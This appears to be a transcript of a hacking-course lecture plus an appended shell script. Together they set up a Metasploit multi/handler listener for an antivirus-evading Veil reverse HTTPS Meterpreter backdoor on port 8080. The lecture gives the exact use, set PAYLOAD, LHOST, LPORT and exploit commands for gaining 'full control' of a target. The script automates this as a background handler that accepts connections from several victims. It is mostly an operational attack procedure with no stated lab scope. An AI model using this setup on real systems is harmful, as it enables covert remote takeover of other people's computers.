Now the backdoor that we created uses a reverse payload. So, like I said before, it does not open a port on the target computer; it actually connects from the target's computer to our computer. And by doing that it will bypass firewalls and it'll look less suspicious. So for this to work we need to open a port on our computer so that the backdoor can connect from the target computer to us on that port. So if you remember, when I created the backdoor I set the port to 8080. So I need to open that port on my Kali machine so that when the target person executes the backdoor, the backdoor can connect back to me on port 8080. So I'm just going to write the name of the payload that we used, because that's very important when you're listening for incoming connections. So we used a payload that's written in Go, and that was meterpreter/rev_https, which is a reverse HTTPS payload. Now this is not a command; I'm just going to write it in here so that you keep this in mind, and we used port 8080 for the reverse connection. So these are the most important things to keep in mind when listening for incoming connections. So I'm going to split the screen and I'm going to listen for incoming connections in here, and to do that I'm going to use the Metasploit framework. Now, to run Metasploit,

all you have to do is just run msfconsole. Now, the Metasploit framework is a huge framework for penetration testing. So the Meterpreter backdoor, or the Meterpreter payload that Veil creates for us, is actually programmed by the people who made Metasploit. That's why we're using Metasploit to listen for incoming connections. So Veil-Evasion actually uses Metasploit to generate the backdoor that we chose in the previous video. So to listen for incoming connections we're going to use a module in Metasploit. Now, as I said, Metasploit is a huge framework and it has a lot of modules. So the module that we're interested in is a module that allows us to listen for incoming connections from a Meterpreter payload. To use that module we're going to do use, to use a module, and then we're going to specify the module name, and the module name is exploit/multi/handler. OK, so the command we're using is use, to specify the module that we want to use, and we're using a module called exploit/multi/handler that allows us to listen for incoming connections. I'm going to hit enter; I was already in that module, so you can see that nothing changed for me, but for you, you should navigate to that module. And I'm going to do show options to see the options that I can set for this module.

And you can see that you can specify different options for it. The most important thing that you want to specify is the payload. So you can see in here, for me, it's set to windows/meterpreter/reverse_tcp. And if you remember what we used, we used meterpreter reverse_https, not TCP. So you want to change this. The first part is fine because our target is going to be Windows, but you want to change the reverse_tcp to reverse_https, and you can change that exactly the same way that we did with Veil-Evasion. So you type in set, you put the option name that you want to change, and we want to change the option for the payload. So we're going to say payload, and we're going to set that to windows/meterpreter/reverse_https this time. OK, so we're doing set to set an option. We're setting the payload to windows/meterpreter/reverse_https. Now this payload should correspond to the payload that you chose in the backdoor. So in the backdoor we used meterpreter reverse_https; that's why in here we're using reverse_https as well. If you chose the reverse HTTP, then set this to reverse_http. If you used reverse TCP, then set this to reverse_tcp, and so on. So I'm going to hit enter for this, and that's going to do it for me.

And if I do show options now, you'll see the payload changed to windows/meterpreter/reverse_https. Now the same concept applies for all the other options. So you want to set the LHOST to our IP address, and you can see that this is already set to the right one. So if it was wrong for you, all you have to do is just do set LHOST and put your IP address. You can get the IP address using ifconfig, like I showed you in the previous lecture. So for me it's 10.20.14.213, and again this is the same IP that I used when I created my backdoor. And the same goes for the port; you want to set the same port. So we're going to do set LPORT to 8080, because that's the port that we used when we generated the backdoor. So again, the main idea with this is you want to set the payload, the host and the port to exactly the same options that you chose when you created the backdoor. Once done with that, we're going to do show options one more time, and you'll see that I have my payload set properly: windows/meterpreter/reverse_https. I have my LHOST and I have my LPORT, and all of that is done properly. So all we have to do now is just do exploit. And now Metasploit is waiting for connections, as you can see, on port 8080

and on my IP address, which is 10.20.14.213. So now if anybody opens the backdoor that we created in the previous lecture, because it's a reverse backdoor, the backdoor will try to connect to the IP that we set when we created the backdoor, which was 10.20.14.213, and it will try to connect on port 8080. It's going to come to this computer, and this computer is already waiting for that connection from this multi/handler module. So the connection will be established, and then I'll be able to control the target computer; I'll basically hack it and have full control over it. Now in the next lecture I'll show you a very basic way to deliver the backdoor to the target computer and how to test the backdoor and make sure that it works properly.
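The lecture's whole procedure (use exploit/multi/handler, then set PAYLOAD, LHOST and LPORT to exactly what the backdoor was generated with, then exploit) is easy to get wrong by hand, and a mismatch on any of the three is the most common reason a reverse Meterpreter never shows up. The POSIX shell script below is an added example, not part of the lecture or of Metasploit or Veil: it validates the three values, checks that nothing on the Kali host already listens on the chosen port (the handler would otherwise fail to bind), and writes a Metasploit resource script that msfconsole can run with -r. The default values (windows/meterpreter/reverse_https, 10.20.14.213, 8080) are the ones the lecture uses; the file name handler.rc and the helper names are my own choices.

```shell
#!/bin/sh
# Added example (not from the lecture): generate a Metasploit resource script for
# exploit/multi/handler whose PAYLOAD/LHOST/LPORT match the values used when the
# backdoor was generated, so the listener and the backdoor cannot drift apart.
# Assumed defaults: windows/meterpreter/reverse_https, LHOST 10.20.14.213, LPORT 8080.
# Generating and checking the script works offline; msfconsole is only needed to run it.

# Validate a TCP port number: decimal integer in 1..65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Validate a dotted-quad IPv4 address (exactly four decimal octets, each 0..255).
valid_ipv4() {
  _ip="$1"
  _old_ifs="$IFS"; IFS=.
  set -- $_ip
  IFS="$_old_ifs"
  [ $# -eq 4 ] || return 1
  for _o in "$@"; do
    case "$_o" in ''|*[!0-9]*) return 1 ;; esac
    [ "$_o" -le 255 ] || return 1
  done
  return 0
}

# Print the resource script for a handler with the given payload, LHOST and LPORT.
# Only reverse Meterpreter payloads make sense here (a bind payload would need a
# different setup). ExitOnSession false + exploit -j keeps the handler running as a
# background job so more than one target can connect back to the same listener.
handler_rc() {
  _payload="$1"; _lhost="$2"; _lport="$3"
  valid_ipv4 "$_lhost" || { echo "bad LHOST: $_lhost" >&2; return 1; }
  valid_port "$_lport" || { echo "bad LPORT: $_lport" >&2; return 1; }
  case "$_payload" in
    *meterpreter*reverse_*) ;;
    *) echo "not a reverse meterpreter payload: $_payload" >&2; return 1 ;;
  esac
  printf '%s\n' \
    "use exploit/multi/handler" \
    "set PAYLOAD $_payload" \
    "set LHOST $_lhost" \
    "set LPORT $_lport" \
    "set ExitOnSession false" \
    "exploit -j"
}

# Return 0 when no local TCP listener already occupies the port. Uses ss(8);
# if ss is not available the check is skipped and the port is assumed free.
port_free() {
  if command -v ss >/dev/null 2>&1; then
    ! ss -ltn 2>/dev/null | awk '{print $4}' | grep -q ":$1\$"
  else
    return 0
  fi
}

# Usage: sh handler.sh [payload] [lhost] [lport]   (defaults are the lecture's values)
main() {
  payload="${1:-windows/meterpreter/reverse_https}"
  lhost="${2:-10.20.14.213}"
  lport="${3:-8080}"
  port_free "$lport" || { echo "port $lport is already in use on this host" >&2; return 1; }
  handler_rc "$payload" "$lhost" "$lport" > handler.rc || return 1
  echo "wrote handler.rc; start the listener with: msfconsole -q -r handler.rc"
}
main "$@"
```

Keep the same three values in one place (for instance a small note or this script's arguments) when you generate the backdoor in Veil and when you start the handler; if the session never arrives, compare PAYLOAD, LHOST and LPORT on both sides before suspecting the firewall or antivirus.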